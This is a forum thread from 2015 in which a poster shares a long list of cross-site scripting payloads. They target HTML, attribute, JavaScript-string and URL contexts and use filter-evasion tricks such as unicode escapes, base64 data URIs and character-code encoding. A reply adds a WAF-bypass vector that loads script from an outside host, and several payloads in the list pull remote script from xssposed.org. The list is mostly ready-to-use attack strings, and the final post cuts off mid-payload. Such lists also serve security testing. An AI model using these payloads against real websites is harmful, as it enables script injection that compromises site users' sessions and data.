New And 0day XSS Vectors collected from everywhere

R3NW4
Posts:23
Joined:Thu Nov 26, 2015 4:45 pm
New And 0day XSS Vectors collected from everywhere

Post by R3NW4 » Thu Nov 26, 2015 6:23 pm

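Hi. First, follow me on Twitter: @R3NW4
The list below mixes test strings for several injection contexts (HTML body, attribute values, JavaScript string literals and URL schemes), so a filter or encoder that handles only one of those contexts will not cover the rest.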
*Updated*

<a/onmousemove=alert('XSSPOSED')//><h1>A<br>A<br>A<br>A<br>A<br>A<br>A<br>A<br>A<br>A<br>R3NW4 says /XSS/ <!--

"'/>;</style><script>a=eval;b=alert;a(b(/ XSSPOSED/.source));</script>'">

';alert(/XSSPOSED/)//';alert(/XSSPOSED/)//";alert(/XSSPOSED/)//";alert(/XSSPOSED/)//--></sCRipT>">'><sCRipT>alert(/XSSPOSED/)</sCRipT>

'}};">});});})]--></SCRIPT>-</style>-</title>-</BoDy>-<marquee>-<h1>R3NW4</h1>-</marquee>-<svg/onload=alert('XSSPOSED');>;{{'

#prettyPhoto[r3nw4]/1,<img src=x onerror=alert(/XSSPOSED/)>/

\';alert(String.fromCharCode(88,83,83))//\\\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\\\";</SCalert(String.fromCharCode(88String.fromCharCode(88, 115, 115, 32, 66, 121, 32, 72, 51, 65, 82, 84, 95, 66, 76, 51, 51, 68), 83, 83))RIPT>\">\'><SCRIPT>alert("XSSPOSED")</SCRIPT>

';alert(0)//\';alert(1)//";alert(2)//\";alert+(3)//--></SCRIPT>">'+><SCRIPT>alert(/XSSPOSED/)</SCRIPT>=&{}");}alert(6+);function+xss(){//

" onmouseover=alert(/Xssposed/)>R3NW4
"/>>;--></SCRIPT>R3NW4<AuDiO/**/oNLoaDStaRt='(_=/**/confirm/**/(/XSSPOSED/))'/src><!--
'"/>>--><iMg/sRc=/**/%0AoneRRoR=%2bal\u0065rt(/XSSPOSED/)>
'"--></style></script>"'/>><img+src=x onerror=alert(/XSSPOSED/)><h1>R3NW4</h1>
'|alert('XSSPOSED')|'
'*prompt('xssposed')*'
<SCRIPT>alert('XSSPOSED');</SCRIPT>
R3NW4" onfocus=prompt(/XSSPOSED/) autofocus fragment="
""autofocus/onfocus=alert(/XSSposed/)//"
"><sVG/*_*/R3NW4/OnLoaD="window['pr\u006fmp\u0074']/*/*/('XSSPOSED')";/>
r3nw4\"'/>><svg+onload=eval(location.hash.substr(1))>#\u0077hile(\u0074rue){pr\u006fmp\u0074(/XSSPOSED/)}
0'"><script/0~~~>;alert('XSSPOSED');</script/0~~~>
-->"><img x/src=x /onerror="x-\u0063onfirm('XSSPOSED')"><!--
<VidEo/oNLoaDStaRt=confirm(/XSSPOSED/)+/src>
<BoDy%0AOnpaGeshoW=%2bwindow.prompt(/XSSPOSED/)<!--
<video/src=//w3schools.com/tags/movie.mp4%0Aautoplay/onplay=(confirm(document.domain))>
<body/onload=confirm(String.fromCharCode(88,83,83,80,79,83,69,68))>
<p/%0Aonmouseover%0A=%0Aconfirm(/XSSPOSED/)>R3NW4
<object data='data:text/html;base64,PFNDUklQVD5hbGVydCgnWFNTUE9TRUQnKTs8L1NDUklQVD4=' /src>
<InpuT/**/onfocus=pr\u006fmpt(/XSSPOSED/)%0Aautofocus>R3NW4
<img src="x:alert" onerror="eval(src%2b'(/XSSPOSED/)')">
<img/src=R3NW4%0A/**/onerror=eval('al'%2b'ert(/XSSPOSED/)')>
<script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script>
<scr<script>ipt>alert('XSS');</scr</script>ipt>
<input type="text" name="foo" value=""autofocus/onfocus=alert(/XSSposed/)//">
<math href="javascript:alert(1)">CLICKME
"'><body/onload=alert('XSSPOSED')//'">
" autofocus onfocus=alert('XSSPOSED') "
'}};alert('XSSPOSED');{{'
<script>alert(navigator.userAgent)</script>
<var onmouseover="prompt(/XSSPOSED/)">R3NW4</var>-KURD
"><h1/onmouseover='alert(/Xssposed/)'>R3NW4
<img src=x:alert(alt) onerror=eval(src) alt=XSSPOSED>
<object data="javascript:alert('XSSPOSED')">
"><--'<script>window.confirm('xssposed')</script> --!>
<isindex type=image src=1 onerror=alert('XSSPOSED')>
R3nw4"><iframe/onload=alert('XSSPOSED')>"><img src=x onerror=prompt('XSSPOSED');>
<script>'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074('\u0031')</script>
<div onmouseover=prompt("/XSSPOSED/")>R3NW4
"><img src=x onerror=window.open('data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTUE9TRUQnKTwvc2NyaXB0Pg==');>
<plaintext/onmousemove=prompt(1)>R3NW4
<marquee/onstart=alert('XSSPOSED')>R3NW4
<embed src=javascript:alert('XSSPOSED')>
'"()&%<xps><ScRiPt >prompt('XSSPOSED')</ScRiPt>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<keygen autofocus onfocus=alert(1)>
<div/onmouseover='alert(/XSSPOSED/)'>AAA
>\" onfocus=alert(String.fromCharCode(88,83,83,80,79,83,69,68)) autofocus>
"><svg/onload=document.location.href='https://www.xssposed.org'>
"><audio src=x onerror=confirm("XSSPOSED")>
<iframe src="data:text/html;base64,PFNDUklQVD5hbGVydCgnWFNTUE9TRUQnKTs8L1NDUklQVD4="/>
11111';\u006F\u006E\u0065rror=\u0063onfirm; throw'XSSposed
<img%09onerror=alert('XSSPOSED') src=a>
<i onclick=alert(1)>Click here</i>
<title onpropertychange=javascript:alert('XSS')></title><title title=>
<img src=<b onerror=alert('XSS');>
<img src="x:? title=" onerror=alert(1)//">
<img src="x:gif" onerror="eval('al'%2b'ert(0)')">
<img src="x:gif" onerror="window['al\u0065rt'] (/'XSS'/)"></img>
data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTUE9TRUQnKTwvc2NyaXB0Pg==
data:text/html,<svg/onload=alert('XSSPOSED')>
javascript:"<script>alert(document.domain)</script>"
<a href=[0x0b]" onclick=alert(1)//">click</a>
R3NW4"><a onmouseover%3D"alert('XSSPOSED')">R3NW4
<script/%00%00v%00%00>alert(/R3NW4/)</script>
<b "<script>alert(1)</script>">hola</b>
'"--><*2f*style><*2f*scRipt><scRipt>alert('XSSPOSED')<*2f*scRipt>
/x"-prompt(/XSSPOSED/)-"
'+confirm(/XSSPOSED/)+'
<%tag style=”xss:expression(alert(123))”>
</XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
/R3nw4"><img src=x onerror=prompt('XSSposed')>
'></a></title><bod y onpageshow=prompt(/XSSPOSED/)>
?r3nw4</script><svg/onload=alert(/XSSPOSED/)//r3nw4
R3NW4"><svg/onload=document.location.href='data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4='>
\x3cscript src=https://xssposed.org/1.js\x3e\x3c/script\x3e
@R3nw4<script>$='XSSPOSED',alert($)< /script>-r3nw4/
"--> </script><svg/onload=';alert(/XSSPOSED/);'>
%27%22%3E%3Csvg/onload=prompt%28/XSSPOSED/%29%3E
'"--></style></script>"'/>><img+src=x onerror=alert(/XSSPOSED/)><h1>R3NW4
"<img src=https://xssposed.org/1.js onerror=prompt('XSSPOSED')><
"><h1>R3NW4<script>alert(1)</script>
\x22\x3E\x3C\x2Fscript\x 3E\x3Cscript src\x3Dhttps\x3A\x2F\x2Fxssposed.org\x2F1.js\x3E
"><svg%2Fonload%3Dalert(%2FXSSPOSED%2F)>
<h1>R3NW4<br><br><br><br><img src=x onerror=prompt(String.fromCharCode(47,88,83,83,80,79,83,69,68,47)) /><!--
<svg•onload=alert(/XSSPOSED/)>
r3nw4"><svg onload=alert('XSSPOSED')>
"])},alert('XSSPOSED'));(function xss() {//
""});});});alert('XSSPOSED');$('a').each(function(i){$(this).click(function(event){x({y
<svg onload=alert('XSSPOSED')>
"><h1/onmouseover='alert(/Xssposed/)'>XSSPOSED
"+autofocus+onfocus%3D"alert('XSSPOSED')
</script>< img src=x onerror=alert(/XSSPOSED/)><!--
xss"/onmouseover="alert('XSSPosed')
">@r3nw4<svg%2Fonload%3Dalert(%2FXSSPOSED%2F)>
'"><svg/onload=alert(/XSSPOSED/)>
"><img+src=a+onerror=prompt(/XSSposed/)>
r3nw4"</title>'>><BoDy!><BODY onpageshow=prompt(/XSSPOSED/)></
"/><iframe/onload=prompt(/XSSPOSED/)>
<img src=x onerror=alert(/XSSPOSED/)>
"><img+src%3Dx+onerror%3Dprompt('XSSPOSED')>
" onmouseover=alert(/Xssposed/)>
"onerror=alert(/XSSPOSED/)>
r3nw4-->hacker<svg/onload=alert('XSSPOSED')//
"";<%2Fscript><script>prompt(%2FXSSPOSED%2F)<%2Fscript><"
r3nw4\'); alert("XSSPOSED");//
"><script>setTimeout("alert(/XSSPOSED/)",1000);</script><a x="
<video onerror=alert(1337) </poster>
<input onfocus=alert(1337) </autofocus>
<x:script xmlns:x="http://www.w3.org/1999/xhtml">alert('xss');</x:script>
'"/>></script><script>alert("XSSPOSED")</script>
</script><img src=x onerror=while(true){prompt(/XSSposed/)}>
<script>x='con';s='firm';S='(1)';setTimeout(x+s+S,0);</script>
<script </src="data:,1> (alert)(1337) "">
<script src=data:;base64,YWxlcnQoMTMzNyk=>
</title><script>alert(/XSSPOSED/)</script>
x");$=alert, $('XSSposed');//
'"/>></scr ipt><script>alert("XSSPOSED")</script>
#prettyPhoto[gallery]/1,<a onclick="alert(/XSSPOSED/);">/
"";</script><script>prompt(/XSSPOSED/)</script><"
Last edited by R3NW4 on Wed Feb 17, 2016 11:28 am, edited 1 time in total.

Lewis
Posts:20
Joined:Tue Nov 24, 2015 2:13 pm

Re: New And 0day XSS Vectors collected from everywhere

Post by Lewis » Thu Nov 26, 2015 8:09 pm

ooooooooo; first top quality post on the forum ^_^
:ugeek:

vdvcoder
Posts:16
Joined:Mon Nov 23, 2015 5:29 pm

Re: New And 0day XSS Vectors collected from everywhere

Post by vdvcoder » Thu Nov 26, 2015 10:21 pm

Well, that's a nice list. :D Thank you.

d1m0ck
Posts:28
Joined:Mon Nov 23, 2015 4:54 pm

Re: New And 0day XSS Vectors collected from everywhere

Post by d1m0ck » Fri Nov 27, 2015 9:00 am

Great collection! To add: an XSS vector that bypasses a WAF, from my last report on hackerone.com.

WAF <Script>Alert(Document.Domain)</Script>

XSS exploit bypass WAF <script/src=http://mytesthost.com/1.Js>

R3NW4
Posts:23
Joined:Thu Nov 26, 2015 4:45 pm

Re: New And 0day XSS Vectors collected from everywhere

Post by R3NW4 » Fri Dec 04, 2015 7:36 pm

New One:
<script>'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u007
